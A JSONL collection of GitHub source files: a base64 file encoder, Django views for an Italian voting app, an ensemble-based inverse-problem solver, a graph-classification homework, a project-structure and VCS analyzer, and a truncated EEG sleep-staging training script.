+{"seq_id":"26781160386","text":"#!/usr/bin/python3\n\nimport logging, time, codecs\n\n# Define logging\nlogging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - [%(levelname)s] - %(message)s')\ndebugging = True\nif not debugging:\n\tlogging.disable(logging.DEBUG)\nlogging.info('Starting FileToBase64.py')\nlogging.info('Reading file.')\n\nabsolute_input_path = '/home/dhall/tmp/sunset.jpg'\nabsolute_output_path = '/home/dhall/tmp/sunset.base64'\n\nwith open(absolute_input_path, \"rb\") as binary_input_file, \\\n\t\topen(absolute_output_path, 'wt') as base64_output_file:\n\tbinary_data = binary_input_file.read()\n\tif(debugging):\n\t\tlogging.debug('Debug messages')\n\t\ttime.sleep(.005)\n\t\tprint(binary_data)\n\t\t# Encoding to base64 leaves it in binary mode, need to decode the binary text\n\t\tprint(codecs.encode(binary_data, 'base64'))\n\t\tprint(codecs.encode(binary_data, 'base64').decode('utf-8'))\n\n\tlogging.info('Writing file.')\n\tbase64_output_file.write(codecs.encode(binary_data, 'base64').decode('utf-8'))\n","repo_name":"dallas-hall/python-projects","sub_path":"Attachment-Text-Extraction/FileToBase64.py","file_name":"FileToBase64.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"70640667750","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.views.decorators.cache import cache_control\nfrom django.views.decorators.cache import cache_control\nfrom django.contrib.auth.decorators import login_required\nfrom voteau.models import Votazione, Partecipazioni, Quesito\nfrom django.contrib.auth import get_user_model\nfrom django.contrib import messages\nfrom voteau.forms import *\nfrom django.db.models import Q\nfrom datetime import date\nfrom functools import reduce\nimport operator\nimport ast\n\n\ndef blank(request):\n return redirect('home')\n\n\ndef Login(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('home')\n else:\n messages.info(request, \"Password o username non corretti\")\n return render(request, \"login.html\")\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef home(request):\n return render(request, \"home.html\", {\"votations\": (Votazione.objects.all())})\n\n\ndef register(request):\n form = CreateUserForm()\n if request.method == 'POST':\n form = CreateUserForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('login')\n return render(request, \"register.html\", {'form': form})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef Logout(request):\n logout(request)\n return redirect('login')\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef AddVotation(request):\n form = AddVotazioneForm()\n if request.method == \"POST\":\n form = AddVotazioneForm(request.POST)\n instance = form.instance\n if form.is_valid() or instance.autore_id == 0:\n instance = form.instance\n instance.autore_id = request.user.id\n instance.save()\n messages.success(request, f\"Votazione {instance.nome} creata!\")\n return render(request, \"addvotation.html\", {'form': form})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef votations(request, autoreId, votationId):\n autoreid = int(autoreId)\n autore = User.objects.get(pk=autoreid)\n try:\n votation = Votazione.objects.get(pk=votationId)\n except Votazione.DoesNotExist:\n votation = None\n\n qs = Partecipazioni.objects.all().filter(id_votazione=votation)\n utenti = qs.only('id_partecipante_id')\n if utenti.exists():\n utenti_n = User.objects.exclude(reduce(operator.or_, (Q(id__contains=x) for x in utenti.values_list('id_partecipante', flat=True))))\n return render(request, \"votation.html\", {'votation': votation, \"autore\": autore, \"utenti\": utenti_n, \"partecipazioni\": Partecipazioni.objects.all()})\n else:\n return render(request, \"votation.html\", {'votation': votation, \"autore\": autore, \"utenti\": User.objects.all(), \"partecipazioni\": Partecipazioni.objects.all()})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef DelVote(request, id_v):\n idvv = int(id_v)\n if idvv != 0 and idvv is not None:\n try:\n Votazione.objects.all().filter(id=idvv).delete()\n if Quesito.objects.all().filter(votazione=id_v):\n Quesito.objects.all().filter(votazione=id_v).delete()\n except Votazione.DoesNotExist:\n messages.info(request, \"Votazione non cancellata\")\n return render(request, \"removevotations.html\", {\"votations\": Votazione.objects.all()})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef DelVotation(request):\n return render(request, \"removevotations.html\", {\"votations\": (Votazione.objects.all())})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef Votantia(request, id_v, id_p):\n autoreid = int(id_p)\n user = get_user_model()\n autore = User.objects.get(pk=autoreid)\n try:\n votation = Votazione.objects.get(pk=id_v)\n except Votazione.DoesNotExist:\n votation = None\n\n qs = Partecipazioni.objects.all().filter(id_votazione=votation)\n utenti = qs.only('id_partecipante_id')\n if utenti.exists():\n utenti_n = User.objects.exclude(\n reduce(operator.or_, (Q(id__contains=x) for x in utenti.values_list('id_partecipante', flat=True))))\n return render(request, \"addpartecipante.html\", {\"utenti\": utenti_n, \"votation\": votation})\n else:\n return render(request, \"addpartecipante.html\", {\"utenti\": User.objects.all(), \"votation\": votation})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef Votantir(request, id_v, id_p):\n autoreid = int(id_p)\n user = get_user_model()\n autore = User.objects.get(pk=autoreid)\n try:\n votation = Votazione.objects.get(pk=id_v)\n except Votazione.DoesNotExist:\n votation = None\n\n qs = Partecipazioni.objects.all().filter(id_votazione=votation)\n utenti = qs.only('id_partecipante_id')\n if utenti.exists():\n utenti_n = User.objects.filter(id__in=utenti.values_list('id_partecipante', flat=True))\n return render(request, \"RemovePartecipante.html\", {\"utenti\": utenti_n, \"votation\": votation})\n else:\n return render(request, \"RemovePartecipante.html\", {\"utenti\": [], \"votation\": votation})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef AddPartecipazione(request, id_v, id_p, id_a):\n votazione = Votazione.objects.get(pk=id_v)\n partecipante = User.objects.get(pk=id_p)\n autore = User.objects.get(pk=id_a)\n partecipazione = Partecipazioni(id_votazione=votazione, id_partecipante=partecipante)\n if Partecipazioni.objects.all().filter(id_votazione=votazione).count() < votazione.maxvotanti:\n try:\n partecipazione.save()\n messages.info(request, f\"Partecipante {partecipazione.id_partecipante} aggiunto!\")\n except Exception as e:\n messages.error(request, \"Abbiamo riscontrato un errore salvando la partecipazione\")\n qs = Partecipazioni.objects.all().filter(id_votazione=votazione)\n utenti = qs.only('id_partecipante_id')\n\n\n if utenti.exists():\n utenti_n = User.objects.exclude(reduce(operator.or_, (Q(id__contains=x) for x in utenti.values_list('id_partecipante', flat=True))))\n return render(request, \"AddPartecipante.html\", {'votation': votazione, \"autore\": autore.id, \"utenti\": utenti_n, \"partecipazioni\": Partecipazioni.objects.all()})\n else:\n return render(request, \"AddPartecipante.html\", {'votation': votazione, \"autore\": autore.id, \"utenti\": User.objects.all(), \"partecipazioni\": Partecipazioni.objects.all()})\n else:\n messages.error(request, \"Numero massimo di votanti è stato raggiunto, impossibile aggiungerne altri!\")\n return render(request, \"AddPartecipante.html\",\n {'votation': votazione, \"autore\": autore.id, \"utenti\": [],\n \"partecipazioni\": Partecipazioni.objects.all()})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef makeQuesito(request, id_v):\n form = AddQuesitoForm()\n votation = None\n if request.method == 'POST':\n try:\n votation = Votazione.objects.get(pk=id_v)\n except Votazione.DoesNotExist:\n votation = None\n form = AddQuesitoForm(request.POST)\n if form.is_valid():\n instance = form.instance\n instance.votazione = id_v\n instance.save()\n messages.success(request, \"Quesito creato correttamente!\")\n return render(request, \"makequesito.html\", {'votation': votation, 'form': form})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef removeQuesiti(request, id_v):\n if (id_v != 0 and id_v is not None):\n idvv = int(id_v)\n try:\n quesiti = Quesito.objects.all().filter(votazione=idvv)\n except Votazione.DoesNotExist:\n messages.info(request, \"Votazione non cancellata\")\n\n return render(request, \"removequesito.html\", {\"quesiti\": quesiti})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef removeQuesito(request, id_q):\n idq = int(id_q)\n try:\n Quesito.objects.get(pk=idq).delete()\n messages.info(request, \"Quesito cancellato\")\n except Votazione.DoesNotExist:\n messages.info(request, \"Quesito non cancellato\")\n\n return render(request, \"removequesito.html\", {\"quesiti\": Quesito.objects.all()})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef Voteall(request):\n partecipazioni_sue = Partecipazioni.objects.all().filter(id_partecipante=request.user.id).filter(votato=0)\n partecipazioni_dis = partecipazioni_sue.only('id_votazione_id')\n votation_vote = Votazione.objects.all().filter(id__in=partecipazioni_dis.values_list('id_votazione', flat=True))\n votazionf = []\n for votazione in votation_vote:\n if votazione.datafine > date.today():\n votazionf.append(votazione)\n return render(request, \"voteall.html\", {\"votations\": votazionf})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef Vote(request, id_v):\n quesiti = Quesito.objects.all().filter(votazione=id_v)\n return render(request, \"vote.html\", {\"quesiti\": quesiti})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef saveVot(request, risp, id_v):\n i = 0\n risps = ast.literal_eval(risp)\n if isinstance(risps, int):\n quesiti = Quesito.objects.get(votazione=id_v)\n else:\n quesiti = Quesito.objects.all().filter(votazione=id_v)\n risps = [n for n in risps]\n\n p = Partecipazioni.objects.get(id_partecipante_id=request.user.id, id_votazione=int(id_v))\n p.votato = 1\n p.save()\n v = Votazione.objects.get(pk=int(id_v))\n v.n_votanti = v.n_votanti+1\n v.save()\n if isinstance(risps, int):\n if risps == 1: quesiti.n_fav += 1\n if risps == 2: quesiti.n_ast += 1\n if risps == 3: quesiti.n_nfav += 1\n quesiti.save()\n else:\n for q in quesiti:\n if risps[i] == 1: q.n_fav += 1\n if risps[i] == 2: q.n_ast += 1\n if risps[i] == 3: q.n_nfav += 1\n i += 1\n q.save()\n\n messages.success(request, \"Votazione salvata!\")\n return render(request, \"home.html\", {\"votations\": (Votazione.objects.all())})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef RemovePartecipazione(request, id_v, id_p, id_a):\n votazione = Votazione.objects.get(pk=id_v)\n partecipante = User.objects.get(pk=id_p)\n partecipazione = Partecipazioni(id_votazione=votazione, id_partecipante=partecipante)\n autore = User.objects.get(pk=id_a)\n nome = partecipazione.id_partecipante\n ha_votato_query = Partecipazioni.objects.all().filter(id_partecipante_id=id_p).filter(id_votazione_id=id_v)\n if ha_votato_query.filter(votato=0):\n Partecipazioni.objects.all().filter(id_partecipante_id=id_p).filter(id_votazione_id=id_v).delete()\n messages.info(request, f\"Partecipante {nome} rimosso!\")\n qs = Partecipazioni.objects.all().filter(id_votazione=votazione)\n utenti = qs.only('id_partecipante_id')\n utenti_n = User.objects.all().filter(id__in=utenti.values_list('id_partecipante', flat=True))\n return render(request, \"removepartecipante.html\", {'votation': votazione, \"autore\": autore.id,\n \"utenti\": utenti_n,\n \"partecipazioni\": Partecipazioni.objects.all()})\n else:\n qs = Partecipazioni.objects.all().filter(id_votazione=votazione)\n utenti = qs.only('id_partecipante_id')\n utenti_n = User.objects.all().filter(id__in=utenti.values_list('id_partecipante', flat=True))\n messages.error(request, f\"Partecipante {nome} non può essere rimosso perchè ha già votato!\")\n return render(request, \"removepartecipante.html\", {'votation': votazione,\n \"autore\": autore.id, \"utenti\": utenti_n,\n \"partecipazioni\": Partecipazioni.objects.all()})\n\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef Risultati(request):\n partecipazioni_sue = Partecipazioni.objects.all().filter(id_partecipante=request.user.id)\n partecipazioni_dis = partecipazioni_sue.only('id_votazione_id')\n votazioniv = Votazione.objects.all().filter(id__in=partecipazioni_dis.values_list('id_votazione', flat=True))\n votazionic = Votazione.objects.all().filter(autore_id=request.user.id)\n votazioni = votazionic.union(votazioniv)\n votazionf = []\n for votazione in votazioni:\n if votazione.datafine < date.today():\n votazionf.append(votazione)\n return render(request, \"Risultati.html\", {\"votations\": votazionf})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef Esito(request, id_v):\n user = get_user_model()\n votazione = Votazione.objects.get(pk=int(id_v))\n autore = User.objects.get(pk=votazione.autore.id)\n quesiti = Quesito.objects.all().filter(votazione=int(id_v))\n valida = votazione.n_votanti >= votazione.minvotanti\n perc_fav=[]\n perc_ast=[]\n perc_nfav=[]\n n_partecipanti= Partecipazioni.objects.filter(id_votazione=id_v).count()\n\n if n_partecipanti != 0:\n perc_votato = ((votazione.n_votanti/n_partecipanti)*100)\n else:\n perc_votato = 0\n\n for quesito in quesiti:\n if votazione.n_votanti != 0:\n perc_fav.append((quesito.n_fav / (quesito.n_nfav + quesito.n_fav + quesito.n_ast))*100)\n perc_ast.append((quesito.n_ast / (quesito.n_nfav + quesito.n_fav + quesito.n_ast))*100)\n perc_nfav.append((quesito.n_nfav / (quesito.n_nfav + quesito.n_fav + quesito.n_ast))*100)\n else:\n perc_fav.append(0)\n perc_ast.append(0)\n perc_nfav.append(0)\n perc_list= zip(perc_fav ,perc_ast ,perc_nfav, quesiti)\n return render(request, \"Esito.html\", {\"votation\": votazione, \"autore\": autore, \"valida\": valida, \"listperc\": perc_list , \"percvotato\": perc_votato})\n\n\n","repo_name":"dotPinto/Voteau","sub_path":"voteau/voteau/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14984,"program_lang":"python","lang":"it","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"6798180748","text":"import os\nimport numpy as np\nimport numpy.random as r\nimport scipy.linalg as la\nimport multiprocessing as mp\nimport collections\nimport lib_misc\n\ndata_root = \"{}/solver_md\".format(lib_misc.data_root)\ndefault_settings = {\n 'parallel': True,\n 'adaptive': True,\n 'dt_min': 1e-5,\n 'dt_max': 1e3,\n 'dirname': 'test',\n }\n\nMdIterationData = collections.namedtuple(\n 'MdIterationData', [\n 'solver', 'theta', 'xis', 'delta', 'sigma', 'dt',\n 'new_theta', 'new_xis', 'value_func'])\n\n\n\nclass MdSolver:\n\n def __init__(self, **opts):\n self.J = opts['J']\n self.delta = opts['delta']\n self.sigma = opts['sigma']\n self.dt = opts['dt']\n self.noise = opts['noise']\n self.reg = opts['reg']\n dirname = opts.get('dirname', default_settings['dirname'])\n self.data_dir = \"{}/{}\".format(data_root, dirname)\n os.makedirs(self.data_dir, exist_ok=True)\n self.parallel = opts.get('parallel', default_settings['parallel'])\n self.adaptive = opts.get('adaptive', default_settings['adaptive'])\n self.precond_vec = opts.get('precond_vec', None)\n self.precond_mat = opts.get('precond_mat', None)\n if self.precond_mat is not None:\n self.inv_precond_mat = la.inv(self.precond_mat)\n self.sqrt_precond_mat = la.sqrtm(self.precond_mat)\n if self.adaptive:\n self.dt_min = opts.get('dt_min', default_settings['dt_min'])\n self.dt_max = opts.get('dt_max', default_settings['dt_max'])\n\n def precond_map(self, u):\n if self.precond_vec is None:\n return u\n return self.inv_precond_mat.dot(u - self.precond_vec)\n\n def precond_unmap(self, u):\n if self.precond_vec is None:\n return u\n return self.precond_vec + self.precond_mat.dot(u)\n\n def g_ensembles(self, ip, ensembles):\n # Strange but seemingly necessary to avoid pickling issue? \\_(\")_/\n global forward\n\n def forward(u):\n return ip.forward(self.precond_unmap(u))\n # -------------------------------- #\n if self.parallel:\n pool = mp.Pool(4)\n g_ensembles = pool.map(forward, ensembles)\n pool.close()\n else:\n g_ensembles = np.array([forward(u) for u in ensembles])\n return g_ensembles\n\n def step(self, ip, theta, xis, filename=None):\n\n # Preconditioning\n unmapped_theta = theta\n theta = self.precond_map(theta)\n\n J, dim_u = self.J, ip.d\n g_theta = ip.forward(unmapped_theta)\n\n func = ip.reg_least_squares if self.reg else ip.least_squares\n value_func = func(unmapped_theta)\n\n # Calculation of the LHS in the inner product\n ensembles = np.tile(theta, (J, 1)) + self.sigma*xis\n g_thetas = self.g_ensembles(ip, ensembles)\n grads_approx = (1/self.sigma)*np.array([g - g_theta for g in g_thetas])\n\n if self.noise or self.reg:\n Cxi = (1/J) * xis.T.dot(xis)\n if self.noise:\n sqrt2Cxi = la.sqrtm(2*Cxi)\n if J <= dim_u:\n sqrt2Cxi = np.real(sqrt2Cxi)\n dW = r.randn(dim_u)\n\n drift = 0\n if self.reg:\n inv_Σ = ip.inv_Σ\n prior_μ = np.zeros(len(theta))\n if self.precond_mat is not None:\n prior_μ = prior_μ - self.precond_vec\n inv_Σ = self.sqrt_precond_mat.dot(inv_Σ).dot(self.sqrt_precond_mat)\n drift = - Cxi.dot(inv_Σ).dot(theta - prior_μ)\n\n inner_product = ip.inv_Γ.dot(g_theta - ip.y)\n for grad_approx, xi in zip(grads_approx, xis):\n coeff = grad_approx.dot(inner_product)\n drift -= (1/J) * coeff * xi\n\n my_dt = self.dt\n if self.adaptive:\n dt_0, dt_min, dt_max = self.dt, self.dt_min, self.dt_max\n my_dt = dt_0/(dt_0/dt_max + la.norm(drift, 2))\n my_dt = max(my_dt, dt_min)\n print(\"New time step: {}\".format(my_dt))\n\n new_theta = theta + drift*my_dt + \\\n (np.sqrt(my_dt)*sqrt2Cxi.dot(dW) if self.noise else 0)\n alpha = np.exp(-my_dt/self.delta**2)\n new_xis = alpha * xis + np.sqrt(1-alpha**2) * r.randn(J, dim_u)\n\n # Undo preconditioning\n unmapped_new_theta = self.precond_unmap(new_theta)\n\n data = MdIterationData(\n solver='md', theta=unmapped_theta, xis=xis, delta=self.delta,\n sigma=self.sigma, dt=my_dt, new_theta=unmapped_new_theta,\n new_xis=new_xis, value_func=value_func,)\n\n if filename is not None:\n np.save(\"{}/{}\".format(self.data_dir, filename),\n data._asdict())\n\n return data\n\n\nclass MdSimulation:\n\n def __init__(self, ip, initial, solver, save_step=50):\n self.ip = ip\n self.theta = initial\n self.solver = solver\n self.save_step = save_step\n\n self.xis = np.random.randn(solver.J, ip.d)\n self.all_thetas = []\n self.all_fthetas = []\n self.iteration = 0\n\n def step(self):\n data = self.solver.step(self.ip, self.theta, self.xis,\n filename=\"iteration-{:04d}.npy\".format(self.iteration))\n self.iteration += 1\n self.all_thetas.append(data.theta)\n self.all_fthetas.append(data.value_func)\n print(\"Step: {}\".format(np.linalg.norm(self.theta - data.new_theta)))\n self.theta = data.new_theta\n self.xis = data.new_xis\n\n plot_step = 50\n if self.iteration % self.save_step == 0:\n filename=\"simulation-iteration-{:04d}.npy\".format(self.iteration)\n np.save(\"{}/{}\".format(self.solver.data_dir, filename),\n self.get_data())\n\n return data\n\n def get_data(self):\n all_thetas = np.asarray(self.all_thetas).reshape(self.iteration, self.ip.d)\n all_fthetas = np.asarray(self.all_thetas).reshape(self.iteration, self.ip.d)\n return {'solver': 'md', 'ensembles': all_thetas, 'f_ensembles': all_fthetas}\n","repo_name":"urbainvaes/bayesicle","sub_path":"solver_md.py","file_name":"solver_md.py","file_ext":"py","file_size_in_byte":6071,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"21453822608","text":"def probabilistic_classifier(scores, adjacency_list, ground_truth_node):\n '''\n return average, because weight is 1, thus omitted weight\n :param scores:\n :param adjacency_list:\n :return:\n '''\n for node in range(1, 11):\n if node in ground_truth_node:\n continue\n neibs = adjacency_list[node]\n if len(neibs) == 0:\n continue\n avg = 0\n for neib in neibs:\n avg += scores[neib]\n avg = avg/len(neibs)\n scores[node] = avg\n return scores\n\ndef relational_classification():\n adjacency_list = {\n 1: {2, 3},\n 2: {1, 3, 4},\n 3: {1, 2, 6},\n 4: {2, 7, 8},\n 5: {6, 8, 9},\n 6: {3, 5, 9, 10},\n 7: {4, 8},\n 8: {4, 5, 7, 9},\n 9: {5, 6, 8, 10},\n 10: {6, 9}\n }\n scores = {i: 0.5 for i in range(1,11)}\n\n # initialize ground truth\n scores[3] = 1\n scores[5] = 1\n scores[8] = 0\n scores[10] = 0\n\n # ground truth nodes\n ground_truth_node = {3, 5, 8, 10}\n\n # after second iteration\n iter_n = 2\n for i in range(iter_n):\n scores = probabilistic_classifier(scores, adjacency_list, ground_truth_node)\n print('scores after second iteration:\\n', scores)\n\n # if threshold is 0,5, the negative nodes:\n threshold = 0.5\n neg_nodes = [node for node, value in scores.items() if value < threshold]\n print('negative nodes are:\\n', neg_nodes)\n\n# q1.1\nrelational_classification()\n\ndef belief_propagation():\n '''\n to be done\n :return:\n '''\n pass","repo_name":"WentaoX/home_work_for_Machine_Learning_with_Graphs_2019","sub_path":"hw2-bundle/hw2-q1.py","file_name":"hw2-q1.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"17129002007","text":"import os\nfrom pypro.exceptions import PathNotExists\nfrom pypro.initializers import possibles_vcs\nfrom pypro.utils import my_chdir\nfrom subprocess import call, STDOUT\nfrom shutil import copy, which\n\n\nclass StructureAnalizer:\n \"\"\"Class docstring\n \"\"\"\n\n def __init__(self, custom_prefixes=None):\n self.structure = \"\"\n if custom_prefixes:\n self.exclude_prefixes = custom_prefixes.split(',')\n else:\n self.exclude_prefixes = []\n\n def analize_dir_structure(self, path):\n self.structure = \"\"\n if not os.path.isdir(path):\n raise PathNotExists(\"Dir does not exists\")\n if path.endswith('/'):\n path = path[:-1]\n basename_index = path.find(os.path.basename(path))\n for dirpath, dirnames, filenames in os.walk(path):\n filenames = [filename\n for filename in filenames\n if not self._check_prefixes(filename)]\n dirnames[:] = [dirname\n for dirname in dirnames\n if not self._check_prefixes(dirname)]\n\n self.structure += dirpath[basename_index:] + '/\\n'\n for filename in filenames:\n if filename != '':\n self.structure += os.path.join(dirpath[basename_index:],\n filename) + '\\n'\n\n def _check_prefixes(self, to_check):\n if to_check == '__init__.py':\n return False\n return to_check.startswith(tuple(self.exclude_prefixes))\n\n def restructure(self, replace=False):\n basename = self.structure.split('\\n')[0][:-1]\n dirname = 'project_name'\n if replace:\n return dirname + self.structure.replace(basename, '+')[1:].rstrip()\n return self.structure.replace(basename, dirname).rstrip()\n\n def restructure_as_tree(self):\n template = ''\n for name in self.restructure().split('\\n'):\n level = name.count('/')\n if name.endswith('/'):\n name = name[:-1]\n level -= 1\n indent = \" \" * 4 * level\n basename = name[(name.rfind('/') + 1):]\n template += '{}{}\\n'.format(indent, basename)\n return template\n\n\ndef analize_vcs(path, path_for_copy_files):\n \"\"\"Docstring for analize_vcs.\n \"\"\"\n vcs = tuple(filter(lambda x: len(x) < 4, possibles_vcs))\n command_vcs = dict(zip(vcs, ('status', 'status', 'root', 'info')))\n if not (os.path.isdir(path) and os.path.isdir(path_for_copy_files)):\n raise PathNotExists\n\n def handle_ignore_file(vcs, dest, svn_flag=False):\n ignore_file_name = '.' + vcs + 'ignore'\n if svn_flag:\n pass # svn ignore files stuff here\n else:\n try:\n return copy(ignore_file_name, dest), ignore_file_name\n except FileNotFoundError:\n return None, None\n\n with my_chdir(path):\n for k, v in command_vcs.items():\n svn_flag = True if k == 'svn' else False\n if which(k) and call([k, v], stderr=STDOUT,\n stdout=open(os.devnull, 'w')) == 0:\n file_dest, ignore_file_name = handle_ignore_file(\n k, path_for_copy_files, svn_flag)\n return k, file_dest, ignore_file_name\n return None, None, None\n","repo_name":"Myrmidon-experiments/pypro","sub_path":"pypro/analizers.py","file_name":"analizers.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"70929373671","text":"\"\"\"Training of neural network.\n\"\"\"\n\nimport os\nimport argparse\n\nimport mne\nimport torch\nfrom torch import nn\nfrom braindecode import EEGClassifier\nfrom braindecode.models import SleepStagerChambon2018\nfrom braindecode.util import set_random_seeds\nfrom skorch.helper import predefined_split\nfrom skorch.callbacks import (\n Checkpoint, EarlyStopping, EpochScoring, LRScheduler)\nfrom sklearn.metrics import (\n confusion_matrix, classification_report, balanced_accuracy_score)\nfrom sklearn.utils.class_weight import compute_class_weight\nimport pickle\n\nfrom transforms import Compose, AdditiveWhiteNoise, logm_cov\nfrom models import DynamicSpatialFilter\nfrom utils import (\n load_data, apply_autoreject, split_dataset, none_or_int, get_exp_name,\n seed_np_rng)\n\n\nmne.set_log_level('WARNING')\ntorch.multiprocessing.set_sharing_strategy('file_system')\n\n\ndef main(args):\n\n #%% 1- General stuff\n cuda = torch.cuda.is_available() # check if GPU is available\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n if cuda:\n torch.backends.cudnn.enabled = True\n torch.backends.cudnn.benchmark = not args.deterministic\n torch.backends.cudnn.deterministic = args.deterministic\n else:\n pass # torch.set_num_threads(args.n_jobs)\n\n # Create savedir\n dir_name = get_exp_name(args.dataset, args.model, args.dsf_type,\n args.denoising)\n save_path = os.path.join(args.save_dir, dir_name)\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n\n #%% 2- Load, preprocess and window data\n windows_dataset = load_data(args.dataset, args.window_size_s, args.n_jobs)\n\n if args.denoising == 'autoreject':\n windows_dataset = apply_autoreject(\n windows_dataset, args.seed, args.n_jobs)\n\n # Split into train, valid and test sets\n available_classes = windows_dataset.get_metadata()['target'].unique()\n train_set, valid_set, test_set = split_dataset(\n windows_dataset, args.valid_size, args.test_size,\n random_state_valid=args.random_state_valid,\n random_state_test=args.random_state_test)\n del windows_dataset\n\n if args.denoising == 'data_augm':\n train_set.transform = AdditiveWhiteNoise(\n p=0.5, noise_strength=(0.5, 1), noise_std=(20, 50),\n recording_wise=False)\n\n # Extract weights to balance the loss function\n y_true_train = train_set.get_metadata()['target'].to_numpy()\n train_weights = torch.Tensor(compute_class_weight(\n 'balanced', classes=available_classes, y=y_true_train)).to(device)\n\n #%% 3- Create model\n\n # Set random seed to be able to reproduce results\n set_random_seeds(seed=args.seed, cuda=cuda)\n\n # Extract number of channels and time steps from dataset\n n_classes = len(available_classes)\n n_channels = train_set[0][0].shape[0]\n if args.dsf_type != 'vanilla':\n if args.dsf_type == 'dsfd':\n mlp_input = 'log_diag_cov'\n dsf_soft_thresh = False\n elif args.dsf_type == 'dsfm_st':\n mlp_input = 'logm_cov_eig'\n dsf_soft_thresh = True\n\n # Use CPU to compute logm, it's faster than pytorch with cuda\n train_set.transform = logm_cov if train_set.transform[0] is None \\\n else Compose([train_set.transform[0], logm_cov])\n valid_set.transform = logm_cov\n test_set.transform = logm_cov\n\n else:\n raise ValueError(\n f'dsf_type must be None, dsfd or dsfm_st, got {args.dsf_type}')\n dsf = DynamicSpatialFilter(\n n_channels, mlp_input=mlp_input,\n n_out_channels=args.dsf_n_out_channels,\n apply_soft_thresh=dsf_soft_thresh)\n n_channels = dsf.n_out_channels\n\n input_size_samples = len(train_set.datasets[0].windows.times)\n\n sfreq = train_set.datasets[0].windows.info['sfreq']\n if args.model == 'stager_net':\n model = SleepStagerChambon2018(\n n_channels, sfreq, n_conv_chs=args.n_conv_chs,\n input_size_s=input_size_samples / sfreq, pad_size_s=0.1,\n n_classes=n_classes, dropout=args.dropout, apply_batch_norm=True\n ).to(device)\n else:\n raise NotImplementedError\n\n if args.dsf_type != 'vanilla':\n model = nn.Sequential(dsf, model)\n n_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(f'\\nModel has {n_params} trainable parameters.\\n')\n\n if torch.cuda.device_count() > 1: # Parallelize model over GPUs\n print(f'\\nUsing {torch.cuda.device_count()} GPUs.\\n')\n model = nn.DataParallel(model)\n\n #%% 4- Train and evaluate model\n\n cp = Checkpoint(dirname=save_path)\n early_stopping = EarlyStopping(patience=args.patience)\n train_bal_acc = EpochScoring(\n scoring='balanced_accuracy', on_train=True, name='train_bal_acc',\n lower_is_better=False)\n valid_bal_acc = EpochScoring(\n scoring='balanced_accuracy', on_train=False, name='valid_bal_acc',\n lower_is_better=False)\n\n callbacks = [\n ('cp', cp),\n ('patience', early_stopping),\n ('train_bal_acc', train_bal_acc),\n ('valid_bal_acc', valid_bal_acc),\n ]\n\n if args.cosine_annealing:\n callbacks.append(('lr_scheduler', LRScheduler(\n 'CosineAnnealingLR', T_max=args.n_epochs - 1)))\n\n net = EEGClassifier(\n module=model,\n criterion=torch.nn.CrossEntropyLoss,\n criterion__weight=train_weights,\n optimizer=torch.optim.AdamW,\n optimizer__weight_decay=args.weight_decay,\n train_split=predefined_split(valid_set),\n optimizer__lr=args.lr,\n max_epochs=args.n_epochs,\n batch_size=args.batch_size,\n iterator_train__shuffle=True,\n iterator_train__num_workers=args.num_workers,\n iterator_valid__num_workers=args.num_workers,\n iterator_train__worker_init_fn=seed_np_rng,\n callbacks=callbacks,\n device=device\n )\n net.fit(train_set, y=None)\n\n # Load best model\n net.initialize()\n net.load_params(checkpoint=cp)\n\n # Pickle best model\n with open(os.path.join(save_path, 'best_model.pkl'), 'wb') as f:\n net.train_split = None # Avoid pickling the validation set\n pickle.dump(net, f)\n\n #%% 5- Evaluate performance\n\n y_true_test = test_set.get_metadata()['target'].to_numpy()\n y_pred_test = net.predict(test_set)\n test_bal_acc = balanced_accuracy_score(y_true_test, y_pred_test) * 100\n\n print('\\nTest results:\\n-------------\\n')\n 